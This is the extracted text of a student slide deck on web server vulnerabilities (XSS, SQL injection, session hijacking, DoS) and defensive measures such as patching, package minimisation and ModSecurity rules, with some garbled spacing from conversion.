WEB SERVER VULNERABILITIES AND SECURITY MEASURES Members: Instructor:
Vũ Hoàng Đinh Hoàng Phi MSc Nguyễn Duy
Agenda Web Server Vulnerabilities and Security Measures 1
Abstract
2
Current Network Overview
✓ 3
Security Exposure
4
Cross Site Scripting
5
SQL Injection
6
Session Hijacking
7
Denial Of Service
8
Security Measures
9
Conclusion
Page 1
Page 2
Analysis Web Server Vulnerabilities and Security Measures
Current Network Topology
Templates
1
Software Firewall is in use
1
Low and inflexible security.
2
Don’t have any mechanism for Web LB, and HA, don’t have AV Software
2
Server overload rapidly and repeatedly
3
Web Server and Database Server are running on the same physical server
3
Database Server Security Exposure
4
IIS 6.0 in use
4
Outdated platform in use
5
Server, system, vulnerabilities unpatched
5
Web Server Security Exposure
Page 3
Security Exposure Web Server Vulnerabilities and Security Measures
DEFAULT CONFIGURATION
1
WEB SERVER
VULNERABILITIES
2
WEB APPLICATION
MALICIOUS CODE
3
_ Applying default configuration makes the system and server the target of exploitation. _ An unprotected web application could lead to unmanagable, unusable services. _ Malicious and unwanted codes make the system vulnerable to attack
WEBSITE SOURCE CODE
Page 4
CROSS SITE SCRIPTING We b Se rver Vuln era bilities and
Se cu rity Me asures
Cross-Site Scripting is a type of injection which maliciousattack, scriptsinare injected into the otherwise benign and trusted web sites. The malicious scripts can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. XSS attacks can generally be categorized
into two main categories: stored and reflected. Page 5
SQL INJECTION We b Se rver Vuln era bilities and
Se cu rity Me asures
SQL injection is a form of attack that the attacker taking advantage of weaknesses when the application queries the database to attack with the purposes: insert table, drop table, execute command to explore
information of table, etc… Page 6
SESSION HIJACKING We b Se rver Vuln era bilities and
Se cu rity Me asures
Session Hijacking is the process that steal session identifier of the active session, aims to pass the authentication process to gain illegal access to information or services of a computer system. When a user connects to the server through the authentication process by providing a user ID and password. After user authentication, they access the server and normal operation. During operation, the user does not need to re-authenticate. Attackers take advantage of this to steal the user's active session and the user is not connected to the system. Then the attacker to impersonate the user with just steal session, access to the server without having to log into the system.
Page 7
DENIAL OF SERVICE We b Se rver Vuln era bilities and
Se cu rity Me asures
Denial of Service (DoS) is an attack technique withsite thefrom intent of preventing a web serving normal user activity. DoS attacks, which are normally applied to the network layer, are also possible at the application layer. These malicious attacks can succeed by starving a system of critical resources, vulnerability exploit,
or abuse of functionality. Page 8
Security Measures Web Server Vulnerabilities and Security Measures
WEB SERVER
WEB APPLICATION
SOURCE CODE
Define approriate policies for your own needs Update the server periodically to get the full and final fix for your system
Use Mod_Security Check the log frequently and apply possible rules
Modify / edit source code as your requirement to prevent possible attack. Update the lastest patch to fix vulnerabilities
Page 9
Web Server Web Server Vulnerability and Security Measures User and Password Policy User and Password Policy
Page 10
Web Server Web Server Vulnerability and Security Measures System Patches User and Password Policy
Minimize Softwares Installed
# yum list instal led # yum list packa geNa m e # yum remove package
Na me
Page 11
Web Server Web Server Vulnerability and Security Measures Change Default Port User and Password Policy
Page 12
Web Application Mod_Security Overview
Attack Prevention and Just-in-time Patching
Real-Time Monitoring and Attack Detection
Flexible Rule Engine
ModSecurity is an open source web application firewall developed by Ivan RISTIC for the Apache Web Server.
Page 13
Web Application – Mod_Security Prevent Cro ss Site Scrip tin g ( XSS )
Page 14
Web Application – Mod_Security Prevent Cro ss Site Scrip tin g ( XSS )
Page 15
Web Application – Mod_Security Pre vent SQL I njection
Page 16
Web Application – Mod_Security Pre vent DDO S Attack
Page 17
Web Application – Mod_Security Pre vent DDO S Attack
Page 18
Web Application Pre vent Se ss ion Hija ck ing
Page 19
Web Application Pre vent Se ss ion Hija ck ing
Page 20
Conclusion
1.
Applications, Testing and Prevention evolve, but so do hacking and exploitation.
2.
Administrators must always keep their eyes open for updates, fixes, patches available.
3.
There is never an unbreakable website but quickly, on-time updated websites and active, enthusiastic admins.
Web Server
Web Application
Source Code
Page 21
THANK YOU!